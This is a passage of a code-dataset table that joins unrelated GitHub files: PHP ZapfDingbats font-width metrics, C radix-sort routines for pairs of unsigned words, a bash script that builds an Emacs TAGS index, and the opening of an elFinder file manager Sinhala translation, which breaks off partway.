text
stringlengths 2
100k
| meta
dict |
---|---|
<?php
$type = 'Core';
$name = 'ZapfDingbats';
$up = -100;
$ut = 50;
$cw = array(
chr(0)=>0,chr(1)=>0,chr(2)=>0,chr(3)=>0,chr(4)=>0,chr(5)=>0,chr(6)=>0,chr(7)=>0,chr(8)=>0,chr(9)=>0,chr(10)=>0,chr(11)=>0,chr(12)=>0,chr(13)=>0,chr(14)=>0,chr(15)=>0,chr(16)=>0,chr(17)=>0,chr(18)=>0,chr(19)=>0,chr(20)=>0,chr(21)=>0,
chr(22)=>0,chr(23)=>0,chr(24)=>0,chr(25)=>0,chr(26)=>0,chr(27)=>0,chr(28)=>0,chr(29)=>0,chr(30)=>0,chr(31)=>0,' '=>278,'!'=>974,'"'=>961,'#'=>974,'$'=>980,'%'=>719,'&'=>789,'\''=>790,'('=>791,')'=>690,'*'=>960,'+'=>939,
','=>549,'-'=>855,'.'=>911,'/'=>933,'0'=>911,'1'=>945,'2'=>974,'3'=>755,'4'=>846,'5'=>762,'6'=>761,'7'=>571,'8'=>677,'9'=>763,':'=>760,';'=>759,'<'=>754,'='=>494,'>'=>552,'?'=>537,'@'=>577,'A'=>692,
'B'=>786,'C'=>788,'D'=>788,'E'=>790,'F'=>793,'G'=>794,'H'=>816,'I'=>823,'J'=>789,'K'=>841,'L'=>823,'M'=>833,'N'=>816,'O'=>831,'P'=>923,'Q'=>744,'R'=>723,'S'=>749,'T'=>790,'U'=>792,'V'=>695,'W'=>776,
'X'=>768,'Y'=>792,'Z'=>759,'['=>707,'\\'=>708,']'=>682,'^'=>701,'_'=>826,'`'=>815,'a'=>789,'b'=>789,'c'=>707,'d'=>687,'e'=>696,'f'=>689,'g'=>786,'h'=>787,'i'=>713,'j'=>791,'k'=>785,'l'=>791,'m'=>873,
'n'=>761,'o'=>762,'p'=>762,'q'=>759,'r'=>759,'s'=>892,'t'=>892,'u'=>788,'v'=>784,'w'=>438,'x'=>138,'y'=>277,'z'=>415,'{'=>392,'|'=>392,'}'=>668,'~'=>668,chr(127)=>0,chr(128)=>390,chr(129)=>390,chr(130)=>317,chr(131)=>317,
chr(132)=>276,chr(133)=>276,chr(134)=>509,chr(135)=>509,chr(136)=>410,chr(137)=>410,chr(138)=>234,chr(139)=>234,chr(140)=>334,chr(141)=>334,chr(142)=>0,chr(143)=>0,chr(144)=>0,chr(145)=>0,chr(146)=>0,chr(147)=>0,chr(148)=>0,chr(149)=>0,chr(150)=>0,chr(151)=>0,chr(152)=>0,chr(153)=>0,
chr(154)=>0,chr(155)=>0,chr(156)=>0,chr(157)=>0,chr(158)=>0,chr(159)=>0,chr(160)=>0,chr(161)=>732,chr(162)=>544,chr(163)=>544,chr(164)=>910,chr(165)=>667,chr(166)=>760,chr(167)=>760,chr(168)=>776,chr(169)=>595,chr(170)=>694,chr(171)=>626,chr(172)=>788,chr(173)=>788,chr(174)=>788,chr(175)=>788,
chr(176)=>788,chr(177)=>788,chr(178)=>788,chr(179)=>788,chr(180)=>788,chr(181)=>788,chr(182)=>788,chr(183)=>788,chr(184)=>788,chr(185)=>788,chr(186)=>788,chr(187)=>788,chr(188)=>788,chr(189)=>788,chr(190)=>788,chr(191)=>788,chr(192)=>788,chr(193)=>788,chr(194)=>788,chr(195)=>788,chr(196)=>788,chr(197)=>788,
chr(198)=>788,chr(199)=>788,chr(200)=>788,chr(201)=>788,chr(202)=>788,chr(203)=>788,chr(204)=>788,chr(205)=>788,chr(206)=>788,chr(207)=>788,chr(208)=>788,chr(209)=>788,chr(210)=>788,chr(211)=>788,chr(212)=>894,chr(213)=>838,chr(214)=>1016,chr(215)=>458,chr(216)=>748,chr(217)=>924,chr(218)=>748,chr(219)=>918,
chr(220)=>927,chr(221)=>928,chr(222)=>928,chr(223)=>834,chr(224)=>873,chr(225)=>828,chr(226)=>924,chr(227)=>924,chr(228)=>917,chr(229)=>930,chr(230)=>931,chr(231)=>463,chr(232)=>883,chr(233)=>836,chr(234)=>836,chr(235)=>867,chr(236)=>867,chr(237)=>696,chr(238)=>696,chr(239)=>874,chr(240)=>0,chr(241)=>874,
chr(242)=>760,chr(243)=>946,chr(244)=>771,chr(245)=>865,chr(246)=>771,chr(247)=>888,chr(248)=>967,chr(249)=>888,chr(250)=>831,chr(251)=>873,chr(252)=>927,chr(253)=>970,chr(254)=>918,chr(255)=>0);
$uv = array(32=>32,33=>array(9985,4),37=>9742,38=>array(9990,4),42=>9755,43=>9758,44=>array(9996,28),72=>9733,73=>array(10025,35),108=>9679,109=>10061,110=>9632,111=>array(10063,4),115=>9650,116=>9660,117=>9670,118=>10070,119=>9687,120=>array(10072,7),128=>array(10088,14),161=>array(10081,7),168=>9827,169=>9830,170=>9829,171=>9824,172=>array(9312,10),182=>array(10102,31),213=>8594,214=>array(8596,2),216=>array(10136,24),241=>array(10161,14));
?>
| {
"pile_set_name": "Github"
} |
static GtUwordPair gt_radixsort_ulongpair_bin_get(
const GtRadixbuffer *rbuf,
GtUword binnum)
{
return rbuf->values.ulongpairptr[
(binnum << rbuf->log_bufsize) +
(GtUword) rbuf->nextidx[binnum]];
}
static inline void gt_radixsort_ulongpair_bin_update(
GtUwordPair *source,
GtRadixbuffer *rbuf,
GtUword binnum,
GtUwordPair value)
{
GtUword binoffset = binnum << rbuf->log_bufsize;
rbuf->values.ulongpairptr
[binoffset + (GtUword) rbuf->nextidx[binnum]]=
value;
if ((GtUword) rbuf->nextidx[binnum] < rbuf->buf_size - 1)
{
rbuf->nextidx[binnum]++;
} else
{
GtUword j;
GtUwordPair *wsourceptr, *rsourceptr, *rend, *valptr;
wsourceptr = source +
(rbuf->endofbin[binnum] - (rbuf->buf_size - 1))
;
rsourceptr = wsourceptr + rbuf->buf_size;
rend = source + rbuf->startofbin[binnum+1];
valptr = rbuf->values.ulongpairptr +
binoffset;
for (j=0; j<rbuf->buf_size; j++)
{
*wsourceptr = *valptr;
wsourceptr++;
if (rsourceptr < rend)
{
*valptr = *rsourceptr;
rsourceptr++;
}
valptr++;
}
rbuf->nextidx[binnum] = 0;
}
rbuf->endofbin[binnum]++;
}
static void gt_radixsort_ulongpair_cached_shuffle(GtRadixbuffer *rbuf,
GtUwordPair *source,
GtCountbasetype len,
size_t rightshift)
{
GtUword binoffset, binnum, bufoffset,
nextbin, firstnonemptybin = UINT8_MAX+1;
GtCountbasetype *count, previouscount, currentidx;
GtUwordPair *sourceptr,
*sourceend = source + len;
rbuf->countcached++;
count = rbuf->startofbin; /* use same memory for count and startofbin */
for (binnum = 0; binnum <= UINT8_MAX; binnum++)
{
count[binnum] = 0;
rbuf->nextidx[binnum] = 0;
}
for (sourceptr = source; sourceptr < sourceend; sourceptr++)
{
count[GT_RADIX_KEY(UINT8_MAX,rightshift,sourceptr->a)]++;
}
for (bufoffset = 0, binoffset = 0, binnum = 0; binnum <= UINT8_MAX;
bufoffset += rbuf->buf_size, binoffset += count[binnum], binnum++)
{
const GtUword elems2copy = GT_MIN(rbuf->buf_size,(GtUword) count[binnum]);
if (elems2copy > 0)
{
if (firstnonemptybin == UINT8_MAX+1)
{
firstnonemptybin = binnum;
}
memcpy(rbuf->values.
ulongpairptr + bufoffset,
source + binoffset,
(sizeof *source * elems2copy));
}
}
previouscount = count[0];
rbuf->startofbin[0] = rbuf->endofbin[0] = 0;
nextbin = 0;
for (binnum = 1UL; binnum <= UINT8_MAX; binnum++)
{
GtCountbasetype temp = rbuf->startofbin[binnum-1] + previouscount;
previouscount = count[binnum];
rbuf->startofbin[binnum] = rbuf->endofbin[binnum] = temp;
}
/* to simplify compution of bin end */
rbuf->startofbin[UINT8_MAX+1] = len;
for (currentidx = 0, binnum = firstnonemptybin;
currentidx < len; binnum = nextbin - 1)
{
GtUwordPair tmpvalue;
tmpvalue = gt_radixsort_ulongpair_bin_get(rbuf,binnum);
while (true)
{
binnum = GT_RADIX_KEY(UINT8_MAX,rightshift,tmpvalue.a);
if (currentidx != rbuf->endofbin[binnum])
{
GtUwordPair tmpswap;
tmpswap = tmpvalue;
tmpvalue = gt_radixsort_ulongpair_bin_get(rbuf,binnum);
gt_radixsort_ulongpair_bin_update
(source,rbuf,binnum,
tmpswap);
} else
{
break;
}
}
gt_radixsort_ulongpair_bin_update(source,rbuf,binnum,
tmpvalue);
currentidx++;
/* skip over empty bins */
while (nextbin <= UINT8_MAX && currentidx >= rbuf->startofbin[nextbin])
{
nextbin++;
}
/* skip over full bins */
while (nextbin <= UINT8_MAX &&
rbuf->endofbin[nextbin-1] == rbuf->startofbin[nextbin])
{
nextbin++;
}
if (currentidx < rbuf->endofbin[nextbin-1])
{
currentidx = rbuf->endofbin[nextbin-1];
}
}
for (binnum = 0; binnum <= UINT8_MAX; binnum++)
{
GtUword bufleft = (GtUword) rbuf->nextidx[binnum];
if (bufleft > 0)
{
GtUwordPair *sourceptr, *valptr;
valptr = rbuf->values.ulongpairptr +
(binnum << rbuf->log_bufsize);
sourceptr = source +
(rbuf->startofbin[binnum+1] - bufleft);
memcpy(sourceptr,valptr,(sizeof *sourceptr * bufleft));
}
}
}
static void gt_radixsort_ulongpair_uncached_shuffle(
GtRadixbuffer *rbuf,
GtUwordPair *source,
GtCountbasetype len,
size_t rightshift)
{
GtUword binnum, nextbin;
GtCountbasetype currentidx, previouscount, *count;
GtUwordPair *sourceptr,
*sourceend = source + len;
rbuf->countuncached++;
count = rbuf->startofbin; /* use same memory for count and startofbin */
for (binnum = 0; binnum <= UINT8_MAX; binnum++)
{
count[binnum] = 0;
rbuf->nextidx[binnum] = 0;
}
for (sourceptr = source; sourceptr < sourceend; sourceptr++)
{
count[GT_RADIX_KEY(UINT8_MAX,rightshift,sourceptr->a)]++;
}
previouscount = count[0];
rbuf->startofbin[0] = rbuf->endofbin[0] = 0;
nextbin = 0;
for (binnum = 1UL; binnum <= UINT8_MAX; binnum++)
{
GtCountbasetype temp = rbuf->startofbin[binnum-1] + previouscount;
previouscount = count[binnum];
rbuf->startofbin[binnum] = rbuf->endofbin[binnum] = temp;
}
/* to simplify compution of bin end */
rbuf->startofbin[UINT8_MAX+1] = len;
for (currentidx = 0; currentidx < len; /* Nothing */)
{
GtCountbasetype *binptr;
GtUwordPair tmpvalue;
tmpvalue = source[currentidx];
while (true)
{
binptr = rbuf->endofbin +
(GT_RADIX_KEY(UINT8_MAX,rightshift,tmpvalue.a));
binnum = *binptr;
if (currentidx != binnum)
{
GtUwordPair tmpswap;
tmpswap = tmpvalue;
tmpvalue = source[binnum];
source[binnum] = tmpswap;
(*binptr)++;
} else
{
break;
}
}
source[binnum] = tmpvalue;
currentidx++;
(*binptr)++;
/* skip over empty bins */
while (nextbin <= UINT8_MAX && currentidx >= rbuf->startofbin[nextbin])
{
nextbin++;
}
/* skip over full bins */
while (nextbin <= UINT8_MAX &&
rbuf->endofbin[nextbin-1] == rbuf->startofbin[nextbin])
{
nextbin++;
}
if (currentidx < rbuf->endofbin[nextbin-1])
{
currentidx = rbuf->endofbin[nextbin-1];
}
}
}
static void gt_radixsort_ulongpair_shuffle(GtRadixbuffer *rbuf,
GtUwordPair *source,
GtCountbasetype len,
size_t rightshift)
{
gt_assert(rbuf != NULL);
if ((GtUword) len > rbuf->cachesize)
{
gt_radixsort_ulongpair_cached_shuffle(rbuf,source,len,rightshift);
} else
{
gt_radixsort_ulongpair_uncached_shuffle(rbuf,source,len,
rightshift);
}
}
static void
gt_radixsort_ulongpair_inplace_insertionsort(
GT_UNUSED GtRadixbuffer *rbuf,
GtUwordPair *arr,
GtCountbasetype a_size)
{
GtUwordPair *optr,
*end = arr + a_size;
for (optr = arr + 1; optr < end;
optr++)
{
GtUwordPair *oprevious = optr - 1;
if (optr->a < oprevious->a)
{
GtUwordPair *iptr;
GtUwordPair tmpvalue;
tmpvalue = *optr;
*optr = *oprevious;
for (iptr = oprevious; iptr > arr; iptr -= 1)
{
GtUwordPair *iprevious = iptr - 1;
if (!(tmpvalue.a < iprevious->a))
{
break;
}
*iptr = *iprevious;
}
*iptr = tmpvalue;
}
}
}
static void gt_radixsort_ulongpair_process_bin(
GtStackGtRadixsort_stackelem *stack,
GtRadixbuffer *rbuf,
GtUwordPair *source,
size_t shift)
{
GtUword binnum;
for (binnum = 0; binnum <= UINT8_MAX; binnum++)
{
GtCountbasetype width = rbuf->endofbin[binnum] - rbuf->startofbin[binnum];
if (width >= (GtCountbasetype) 2)
{
GtUwordPair *ptr
= source + rbuf->startofbin[binnum];
if (width == (GtCountbasetype) 2)
{
GtUwordPair *nextptr = ptr + 1;
if (nextptr->a < ptr->a)
{
GtUwordPair tmpswap;
tmpswap = *ptr;
*ptr = *nextptr;
*nextptr = tmpswap;
}
} else
{
if (width <= (GtCountbasetype) 32)
{
rbuf->countinsertionsort++;
gt_radixsort_ulongpair_inplace_insertionsort(rbuf,ptr,width);
} else
{
GtRadixsort_stackelem tmpstackelem;
tmpstackelem.left.ulongpairptr = ptr;
tmpstackelem.len = width;
tmpstackelem.shift = shift - CHAR_BIT;
GT_STACK_PUSH(stack,tmpstackelem);
}
}
}
}
}
static void gt_radixsort_ulongpair_sub_inplace(GtRadixbuffer *rbuf,
GtStackGtRadixsort_stackelem *stack)
{
GtRadixsort_stackelem currentstackelem;
while (!GT_STACK_ISEMPTY(stack))
{
currentstackelem = GT_STACK_POP(stack);
gt_radixsort_ulongpair_shuffle(rbuf,
currentstackelem.left.ulongpairptr,
currentstackelem.len,
currentstackelem.shift);
if (currentstackelem.shift > 0)
{
(void) gt_radixsort_ulongpair_process_bin(stack,rbuf,
currentstackelem.left.ulongpairptr,
currentstackelem.shift);
}
}
}
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env bash
export PATH=~/tools/emacswin/bin/:/bin:/usr/bin:"$PATH"
rm TAGS
find . \( '-path' '*/CVS' \
'-o' '-path' '*/.svn' \
'-o' '-path' '*/autom4te.cache' \
'-o' '-path' '*/{arch}' \
'-o' '-path' '*/.hg' \
'-o' '-path' '*/_darcs' \
'-o' '-path' '*/.git' \
'-o' '-path' '*/.bzr' \
'-o' '-path' '*~*' \
'-o' '-path' '*#' \
'-o' '-path' '*/TAGS' \
'-o' '-path' '*/semantic.cache' \
'-o' '-iname' '*.o' \
'-o' '-iname' '*.class' \
'-o' '-iname' '*.obj' \
'-o' '-iname' '*.pyc' \
'-o' '-path' '*/.ignore' \) -prune \
-o -type f \( -iname '*.cpp' \
-o -iname '*.hpp' \
-o -iname '*.s' \
-o -iname '*.h' \
-o -iname '*.c' \
-o -iname '*.cc' \
-o -iname '*.py' \
-o -iname '*.java' \
-o -iname '*.el' \
-o -iname '*.pl' \
-o -iname '*.inl' \
-o -iname '*.aidl' \
\) -print0 |xargs -0 etags -a "$@"
| {
"pile_set_name": "Github"
} |
/**
* Sinhala translation
* @author CodeLyokoXtEAM <[email protected]>
* @version 2018-03-26
*/
(function(root, factory) {
if (typeof define === 'function' && define.amd) {
define(['elfinder'], factory);
} else if (typeof exports !== 'undefined') {
module.exports = factory(require('elfinder'));
} else {
factory(root.elFinder);
}
}(this, function(elFinder) {
elFinder.prototype.i18.si = {
translator : 'CodeLyokoXtEAM <[email protected]>',
language : 'Sinhala',
direction : 'ltr',
dateFormat : 'Y.m.d h:i A', // Mar 13, 2012 05:27 PM
fancyDateFormat : '$1 h:i A', // will produce smth like: Today 12:25 PM
nonameDateFormat : 'Ymd-His', // to apply if upload file is noname: 120513172700
messages : {
/********************************** errors **********************************/
'error' : 'දෝෂයකි.',
'errUnknown' : 'නොදන්නා දෝෂයකි.',
'errUnknownCmd' : 'නොදන්නා විධානයකි.',
'errJqui' : 'වලංගු නොවන jQuery UI සැකැස්මකි. තේරිය හැකි, ඇදගෙන යාම සහ ඇද දැමිය හැකි කොටස් ඇතුළත් කළ යුතුය.',
'errNode' : 'ElFinder විසින් DOM Element නිර්මාණය කිරීමට අවශ්යව අැත.',
'errURL' : 'වලංගු නොවන elFinder සැකැස්මකි! URL විකල්පය සැකසා නැත.',
'errAccess' : 'භාවිතය අත්හිටුවා ඇත.',
'errConnect' : 'පසුබිම(Backend) වෙත සම්බන්ධ වීමට නොහැකිය.',
'errAbort' : 'සම්බන්ධතාවය වසාදමා ඇත.',
'errTimeout' : 'සම්බන්ධතා කල් ඉකුත්වී ඇත.',
'errNotFound' : 'පසුබිම(Backend) සොයාගත නොහැකි විය.',
'errResponse' : 'වලංගු නොවන පසුබිම(Backend) ප්රතිචාරය.',
'errConf' : 'වලංගු නොවන Backend සැකැස්මකි.',
'errJSON' : 'PHP JSON මොඩියුලය ස්ථාපනය කර නැත.',
'errNoVolumes' : 'කියවිය හැකි එ්කක(volumes) නොමැත.',
'errCmdParams' : '"$1" නම් විධානය වලංගු නොවන පරාමිතියකි.',
'errDataNotJSON' : 'JSON දත්ත නොවේ.',
'errDataEmpty' : 'හිස් දත්තයකි.',
'errCmdReq' : 'Backend සඳහා ඉල්ලන ලද විධානයේ නම අවශ්ය වේ.',
'errOpen' : '"$1" විවෘත කළ නොහැක.',
'errNotFolder' : 'අායිත්තම(object) ෆොල්ඩරයක් නොවේ.',
'errNotFile' : 'අායිත්තම(object) ගොනුවක් නොවේ.',
'errRead' : '"$1" කියවීමට නොහැක.',
'errWrite' : '"$1" තුල ලිවීමට නොහැකිය.',
'errPerm' : 'අවසරය නොමැත.',
'errLocked' : '"$1" අගුළු දමා ඇති අතර එය නැවත නම් කිරීම, සම්පූර්ණයෙන් විස්ථාපනය කිරීම හෝ ඉවත් කිරීම කළ නොහැක.',
'errExists' : '"$1" නම් ගොනුව දැනටමත් පවතී.',
'errInvName' : 'ගොනු නම වලංගු නොවේ.',
'errInvDirname' : 'ෆෝල්ඩර් නම වලංගු නොවේ.', // from v2.1.24 added 12.4.2017
'errFolderNotFound' : 'ෆෝල්ඩරය හමු නොවිණි.',
'errFileNotFound' : 'ගොනුව හමු නොවිණි.',
'errTrgFolderNotFound' : 'ඉලක්කගත ෆෝල්ඩරය "$1" හමු නොවිනි.',
'errPopup' : 'බ්රවුසරය උත්පතන කවුළුව විවෘත කිරීම වළක්වයි. ගොනු විවෘත කිරීම සඳහා බ්රවුසරයේ විකල්ප තුළ එය සක්රිය කරන්න.',
'errMkdir' : '"$1" ෆෝල්ඩරය සෑදීමට නොහැකිය.',
'errMkfile' : '"$1" ගොනුව සෑදිය නොහැක.',
'errRename' : '"$1" නැවත නම් කිරීමට නොහැකි විය.',
'errCopyFrom' : '"$1" volume යෙන් ගොනු පිටපත් කිරීම තහනම්ය.',
'errCopyTo' : '"$1" volume යට ගොනු පිටපත් කිරීම තහනම්ය.',
'errMkOutLink' : 'volume root යෙන් පිටතට සබැඳිය(link) නිර්මාණය කිරීමට නොහැකි විය.', // from v2.1 added 03.10.2015
'errUpload' : 'උඩුගත(upload) කිරීමේ දෝෂයකි.', // old name - errUploadCommon
'errUploadFile' : '"$1" උඩුගත(upload) කිරීමට නොහැකි විය.', // old name - errUpload
'errUploadNoFiles' : 'උඩුගත(upload) කිරීම සඳහා ගොනු කිසිවක් සොයාගත නොහැකි විය.',
'errUploadTotalSize' : 'දත්ත අවසර දී අැති උපරිම ප්රමාණය ඉක්මවා ඇත.', // old name - errMaxSize
'errUploadFileSize' : 'ගොනු අවසර දී අැති උපරිම ප්රමාණය ඉක්මවා ඇත.', // old name - errFileMaxSize
'errUploadMime' : 'ගොනු වර්ගයට අවසර නැත.',
'errUploadTransfer' : '"$1" ව මාරු කිරීමේ දෝෂයකි.',
'errUploadTemp' : 'upload කිරීම සඳහා තාවකාලික ගොනුව සෑදිය නොහැක.', // from v2.1 added 26.09.2015
'errNotReplace' : '"$1" අායිත්තම(object) දැනටමත් මෙම ස්ථානයේ පවතී, වෙනත් වර්ගයකිනි ප්රතිස්ථාපනය කළ නොහැක.', // new
'errReplace' : '"$1" ප්රතිස්ථාපනය කළ නොහැක.',
'errSave' : '"$1" සුරැකීමට නොහැක.',
'errCopy' : '"$1" පිටපත් කිරීමට නොහැක.',
'errMove' : '"$1" සම්පූර්ණයෙන් විස්ථාපනය කිරීමට නොහැක.',
'errCopyInItself' : '"$1" තුලට පිටපත් කිරීමට නොහැක.',
'errRm' : '"$1" ඉවත් කිරීමට නොහැකි විය.',
'errTrash' : 'කුණු-කූඩය තුලට දැමීමට නොහැක.', // from v2.1.24 added 30.4.2017
'errRmSrc' : 'මූලාශ්රය ගොනු(ව) ඉවත් කළ නොහැක.',
'errExtract' : '"$1" වෙතින් ගොනු දිග හැරීමට නොහැක.',
'errArchive' : 'සංරක්ෂිතය සෑදීමට නොහැකි විය.',
'errArcType' : 'නොගැලපෙන සංරක්ෂණ වර්ගයකි.',
'errNoArchive' : 'ගොනුව නොගැලපෙන සංරක්ෂණ වර්ගයක් හෝ සංරක්ෂිතයක් නොවේ.',
'errCmdNoSupport' : 'පසුබිම(Backend) මෙම විධානය නොදනී.',
'errReplByChild' : '"$1" ෆෝල්ඩරය එහිම අඩංගු අයිතමයක් මගින් ප්රතිස්ථාපනය කළ නොහැක.',
'errArcSymlinks' : 'ආරක්ෂිත හේතුව නිසා අනුමත නොකෙරෙන සබැඳි සම්බන්දතා හෝ ලිපිගොනු නම් අඩංගු බැවින් සංරක්ෂිතය දිග හැරීම කිරීමට ඉඩ නොදෙන.', // edited 24.06.2012
'errArcMaxSize' : 'සංරක්ෂිතය ලිපිගොනු උපරිම ප්රමාණය ඉක්මවා ඇත.',
'errResize' : 'ප්රතිප්රමාණය කිරීමට නොහැකි විය.',
'errResizeDegree' : 'වලංගු නොවන භ්රමණ කෝණයකි.', // added 7.3.2013
'errResizeRotate' : 'රූපය භ්රමණය කිරීමට නොහැකි විය.', // added 7.3.2013
'errResizeSize' : 'රූපයේ ප්රමාණය වලංගු නොවේ.', // added 7.3.2013
'errResizeNoChange' : 'රූපයේ ප්රමාණය වෙනස් නොවුණි.', // added 7.3.2013
'errUsupportType' : 'නොගැලපෙන ගොනු වර්ගයකි.',
'errNotUTF8Content' : '"$1" ගොනුව UTF-8 හි නොමැති අතර සංස්කරණය කළ නොහැක.', // added 9.11.2011
'errNetMount' : '"$1" සවි(mount) කිරීමට නොහැක.', // added 17.04.2012
'errNetMountNoDriver' : 'ප්රොටොකෝලය(protocol) නොගැලපේ.', // added 17.04.2012
'errNetMountFailed' : 'සවි කිරීම(mount කිරීම) අසාර්ථක විය.', // added 17.04.2012
'errNetMountHostReq' : 'ධාරකය(Host) අවශ්ය වේ.', // added 18.04.2012
'errSessionExpires' : 'ඔබේ අක්රියතාව හේතුවෙන් සැසිය(session) කල් ඉකුත් වී ඇත.',
'errCreatingTempDir' : 'තාවකාලික ඩිරෙක්ටරයක්(directory) සෑදිය නොහැක: "$1"',
'errFtpDownloadFile' : 'FTP වලින් ගොනුව බාගත(download) කිරීමට නොහැකි විය: "$1"',
'errFtpUploadFile' : 'ගොනුව FTP වෙත උඩුගත(upload) කිරීමට නොහැකි විය: "$1"',
'errFtpMkdir' : 'FTP මත දුරස්ථ නාමාවලියක්(remote directory) නිර්මාණය කිරීමට නොහැකි විය: "$1"',
'errArchiveExec' : 'ගොනු සංරක්ෂණය(archiving) කිරීමේදී දෝෂයක් ඇතිවිය: "$1"',
'errExtractExec' : 'ගොනු දිගහැරීමේදී(extracting) දෝෂයක් ඇතිවිය: "$1"',
'errNetUnMount' : 'විසන්ධි කිරීමට(unmount) නොහැක.', // from v2.1 added 30.04.2012
'errConvUTF8' : 'UTF-8 වෙත පරිවර්තනය කළ නොහැක.', // from v2.1 added 08.04.2014
'errFolderUpload' : 'ඔබ ෆෝල්ඩරය උඩුගත(upload) කිරීමට කැමති නම් නවීන බ්රවුසරයකින් උත්සාහ කරන්න.', // from v2.1 added 26.6.2015
'errSearchTimeout' : '"$1" සෙවීම කල් ඉකුත්වී ඇත. සෙවුම් ප්රතිඵල අර්ධ වශයෙන් දිස්වේ.', // from v2.1 added 12.1.2016
'errReauthRequire' : 'නැවත බලය(Re-authorization) ලබා දීම අවශ්ය වේ.', // from v2.1.10 added 24.3.2016
'errMaxTargets' : 'තෝරා ගත හැකි උපරිම අයිතම සංඛ්යාව $1 ක් වේ.', // from v2.1.17 added 17.10.2016
'errRestore' : 'කුණු කූඩයෙන් නැවත ලබා ගත නොහැක. යළි පිහිටුවීමේ ගමනාන්තය(restore destination) හඳුනාගත නොහැක.', // from v2.1.24 added 3.5.2017
'errEditorNotFound' : 'මෙම ගොනු වර්ගයේ සංස්කාරකය හමු නොවිණි.', // from v2.1.25 added 23.5.2017
'errServerError' : 'සේවාදායකයේ පැත්තෙන්(server side) දෝශයක් ඇතිවිය.', // from v2.1.25 added 16.6.2017
'errEmpty' : '"$1" ෆෝල්ඩරය හිස් කිරීමට නොහැක.', // from v2.1.25 added 22.6.2017
/******************************* commands names ********************************/
'cmdarchive' : 'සංරක්ෂිතය(archive) නිර්මාණය කරන්න',
'cmdback' : 'ආපසු',
'cmdcopy' : 'පිටපත් කරන්න',
'cmdcut' : 'මුළුමනින්ම පිටපත් කරන්න(Cut)',
'cmddownload' : 'බාගත කරන්න(Download)',
'cmdduplicate' : 'අනුපිටපත් කරන්න(Duplicate)',
'cmdedit' : 'ගොනුව සංස්කරණය කරන්න',
'cmdextract' : 'සංරක්ෂිතයේ ගොනු දිගහරින්න(Extract)',
'cmdforward' : 'ඉදිරියට',
'cmdgetfile' : 'ගොනු තෝරන්න',
'cmdhelp' : 'මෙම මෘදුකාංගය පිළිබඳව',
'cmdhome' : 'නිවහන(Home)',
'cmdinfo' : 'තොරතුරු ලබාගන්න',
'cmdmkdir' : 'අළුත් ෆෝල්ඩරයක්',
'cmdmkdirin' : 'අළුත් ෆෝල්ඩරයක් තුළට', // from v2.1.7 added 19.2.2016
'cmdmkfile' : 'නව ගොනුවක්',
'cmdopen' : 'විවෘත කරන්න',
'cmdpaste' : 'දමන්න(Paste)',
'cmdquicklook' : 'පූර්ව දර්ශනයක්(Preview)',
'cmdreload' : 'නැවත අළුත් කරන්න(Reload)',
'cmdrename' : 'නම වෙනස් කරන්න',
'cmdrm' : 'මකන්න',
'cmdtrash' : 'කුණු කූඩයට දමන්න', //from v2.1.24 added 29.4.2017
'cmdrestore' : 'යළි පිහිටුවන්න(Restore)', //from v2.1.24 added 3.5.2017
'cmdsearch' : 'ගොනු සොයන්න',
'cmdup' : 'ප්ර්රධාන නාමාවලිය(parent directory) වෙත යන්න',
'cmdupload' : 'ගොනු උඩුගත(Upload) කරන්න',
'cmdview' : 'දර්ශනය(View)',
'cmdresize' : 'ප්රථිප්රමාණය සහ භ්රමණය',
'cmdsort' : 'වර්ගීකරණය කරන්න',
'cmdnetmount' : 'ජාල එ්කකයක් සවි කරන්න(Mount network volume)', // added 18.04.2012
'cmdnetunmount': 'ගලවන්න(Unmount)', // from v2.1 added 30.04.2012
'cmdplaces' : 'පහසු ස්ථානයට(To Places)', // added 28.12.2014
'cmdchmod' : 'ක්රමය වෙනස් කරන්න', // from v2.1 added 20.6.2015
'cmdopendir' : 'ෆෝල්ඩරය විවෘත කරන්න', // from v2.1 added 13.1.2016
'cmdcolwidth' : 'නැවත තීරු පළල පිහිටුවන්න', // from v2.1.13 added 12.06.2016
'cmdfullscreen': 'පුළුල් තිරය', // from v2.1.15 added 03.08.2016
'cmdmove' : 'මාරු කරන්න(Move)', // from v2.1.15 added 21.08.2016
'cmdempty' : 'ෆෝල්ඩරය හිස් කරන්න', // from v2.1.25 added 22.06.2017
'cmdundo' : 'නිෂ්ප්රභ කරන්න', // from v2.1.27 added 31.07.2017
'cmdredo' : 'නැවත කරන්න', // from v2.1.27 added 31.07.2017
'cmdpreference': 'අභිමතයන් (Preferences)', // from v2.1.27 added 03.08.2017
'cmdselectall' : 'සියල්ල තෝරන්න', // from v2.1.28 added 15.08.2017
'cmdselectnone': 'කිසිවක් තෝරන්න එපා', // from v2.1.28 added 15.08.2017
'cmdselectinvert': 'විරුද්ධ අාකාරයට තෝරන්න', // from v2.1.28 added 15.08.2017
/*********************************** buttons ***********************************/
'btnClose' : 'වසන්න',
'btnSave' : 'සුරකින්න',
'btnRm' : 'ඉවත් කරන්න',
'btnApply' : 'යොදන්න(Apply)',
'btnCancel' : 'අවලංගු කරන්න',
'btnNo' : 'නැත',
'btnYes' : 'ඔව්',
'btnMount' : 'සවිකිරීම(Mount)', // added 18.04.2012
'btnApprove': 'කරුණාකර $1 අනුමත කරන්න', // from v2.1 added 26.04.2012
'btnUnmount': 'ගලවන්න(Unmount)', // from v2.1 added 30.04.2012
'btnConv' : 'පරිවර්තනය කරන්න', // from v2.1 added 08.04.2014
'btnCwd' : 'මෙතන', // from v2.1 added 22.5.2015
'btnVolume' : 'එ්කකය(Volume)', // from v2.1 added 22.5.2015
'btnAll' : 'සියල්ල', // from v2.1 added 22.5.2015
'btnMime' : 'MIME වර්ගය', // from v2.1 added 22.5.2015
'btnFileName':'ගොනුවේ නම', // from v2.1 added 22.5.2015
'btnSaveClose': 'සුරකින්න සහ වසන්න', // from v2.1 added 12.6.2015
'btnBackup' : 'උපස්ථ(Backup) කරන්න', // fromv2.1 added 28.11.2015
'btnRename' : 'නම වෙනස් කරන්න', // from v2.1.24 added 6.4.2017
'btnRenameAll' : 'නම වෙනස් කරන්න(සියල්ල)', // from v2.1.24 added 6.4.2017
'btnPrevious' : 'පෙර ($1/$2)', // from v2.1.24 added 11.5.2017
'btnNext' : 'ඊළඟ ($1/$2)', // from v2.1.24 added 11.5.2017
'btnSaveAs' : 'වෙනත් නමකින් සුරකිමින්(Save As)', // from v2.1.25 added 24.5.2017
/******************************** notifications ********************************/
'ntfopen' : 'ෆෝල්ඩරය විවෘත කරමින්',
'ntffile' : 'ගොනුව විවෘත කරමින්',
